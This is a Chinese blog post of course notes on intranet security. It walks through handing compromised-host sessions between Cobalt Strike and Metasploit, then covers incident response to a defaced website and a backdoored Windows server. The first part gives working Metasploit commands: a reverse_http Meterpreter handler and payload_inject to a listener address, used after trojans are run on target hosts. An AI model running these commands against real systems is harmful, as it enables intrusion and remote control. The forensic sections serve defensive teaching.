72:内网安全-域横向CS&MSF联动及应急响应初识 ---可以通过tasklist和netstat找到进程和对应端口;PCHunter64工具真好用啊!!!进程的网络连接情况,修改注册表,启动项等信息一应俱全,如果是图谱方式展示就更赞了!!!EDR可以借鉴。

72:内网安全-域横向CS&MSF联动及应急响应初识

思维导图1-权限维持

  • 时间原因,权限维持内容本课不再讲解,后期有时间的话会补充。而且权限维持属于渗透后期的知识,关键还是前面的内容,多实践,多总结。

思维导图2-应急响应

本课重点:

  • 案例1:MSF&CobaltStrike联动Shell
  • 案例2:WEB攻击应急响应朔源-后门,日志
  • 案例3:WIN系统攻击应急响应朔源-后门,日志,流量

案例1:MSF&CobaltStrike联动Shell

为什么要进行联动?因为cs和msf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在cs、msf、powershell之间进行会话委派。powershell本身用处少,而且很多正式环境上的powershell默认执行策略是关闭的,总的来说有的鸡肋,所以这里就不再讲了。

1
2
3
4
5
CS->MSF
创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器
MSF->CS
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线
use exploit/windows/local/payload_inject

环境准备:2台外网服务器(分别部署msf和cs)和一台webserver服务器、一台本地主机。在webserver和本地主机执行木马,实现域内主机上线,先将会话从cs移交到msf,再从msf移交到cs,实现互相切换。

案例演示1-cs移交到msf ==》本质就是在做转发

<1>启动cs,在在webserver和本地主机执行木马,实现webserver和本地主机上线。

<2>CS上,创建Foreign监听器

<3>MSF监听模块设置对应地址端口

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http #这个payload要跟CS设置的payload保持一致
set lhost 0.0.0.0 #不设置也行
set lport 4444 #端口需要与cs监听器端口保持一致
exploit

<4>CS执行Spawn选择监听器。具体步骤:右击本地主机图标-->spawn(权利委派)-->选择msf监听器,如果想要msf接管webserver主机权限,就先右击webserver主机图标

<5>等待一会儿,msf接收到会话。如果一直没有反弹结果,可能就是网络问题,此时就要看看接管主机类型了(如果是虚拟机,一般没什么问题。但是阿里云服务器上面有个端口问题,要开启4444端口,还可以右键session——sleep设1试试)

案例演示2-msf移交到cs

<1>CS创建监听器

<2>MSF载入新模块注入设置对应地址端口

1
2
3
4
5
6
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http #这个payload要跟CS监听器设置的payload保持一致
set lport 5566 #端口需要与cs监听器端口保持一致
set lhost 101.37.160.211 # IP设置为msf本地IP,与CS设置保持一致
set session 4 #上面第<5>步生成的session就是4
exploit

<3>等待一会儿,会话4的shell就反弹到CS上面了

案例2:WEB攻击应急响应溯源-后门,日志

1
2
3
4
故事回顾:某客户反映自己的网站首页出现篡改,请求支援
分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式等
思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
思路2:利用后门webshell查杀脚本或工具找到对应后门文件,定位第一次时间分析

站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。

案例演示

<1>执行netstat -ano命令,通过开放的端口找到对应的PID。

<2>执行tasklist -svc命令,通过PID找到对应的进程名称。

<3>在任务管理器,右击进程名称,选择打开文件位置。

直接定位到具体位置

<4>根据不同的服务名,找寻对应的日志存储目录。

<5>打开日志,分析异常操作,发现有人上传了x.php文件。

<6>通过网站目录找到x.php

<7>打开看一下,是后门文件。

<8>还可以去网站目录查看首页修改时间,查找网站相关日志,定位修改时间基数,将该时间之前的日志进行攻击分析(分析攻击者是如何修改首页内容的),该时间之后的日志进行操作分析(分析攻击者修改网页之后还进行了什么操作,是否留有后门等)

<9>利用后门webshell查杀脚本或工具找到对应后门文件,网上有很多查杀工具,比如D盾_Web查杀、百度WEBDIR+、河马、Sangfor WebShellKill、深度学习模型检测PHP Webshell、PHP Malware Finder、在线webshell查杀工具等。参考:https://blog.csdn.net/qq_25645753/article/details/110196602

比如使用河马查杀,安装之后,扫描,发现两个后门。然后去日志搜索相关关键字,找到是谁访问了这个后门,如何操作等。

案例3:WIN系统攻击应急溯源-后门,日志,流量

1
2
3
4
5
6
7
分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式等
故事回顾:某客户反映服务器出现卡顿等情况,请求支援
思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量
获取进监控:PCHunter64
获取执行列表:UserAssistView
UserAssistView下载:https://www.onlinedown.net/soft/628964.htm
AppCompatCacheParser.exe --csv c:\temp -t

案例演示

<1>打开PCHunter64工具,查看正在运行的进程,发现异常进程artifact.exe(名字不熟悉,没有厂商信息等)

<2>在网络模块,发现该进程与外部IP地址进行网络连接,很可疑。

<3>PCHunter64工具还有很多其他功能,可以进一步分析该进程是否是后门或者勒索病毒等。

<4>UserAssistView工具可以看到windows系统所有文件的执行时间记录,比如我们可以查看一下artifact.exe上次修改的时间。说明在这个时间点前后攻击者一定对系统进行了一些操作,相应地,我们就可以以此时间为基数,定位查找日志将该时间之前的日志进行攻击分析(分析攻击者是如何攻击服务器的),该时间之后的日志进行操作分析(分析攻击者登录服务器后进行了什么操作)

posted @ 2022-02-20 22:15  bonelee  阅读(270)  评论(0编辑  收藏  举报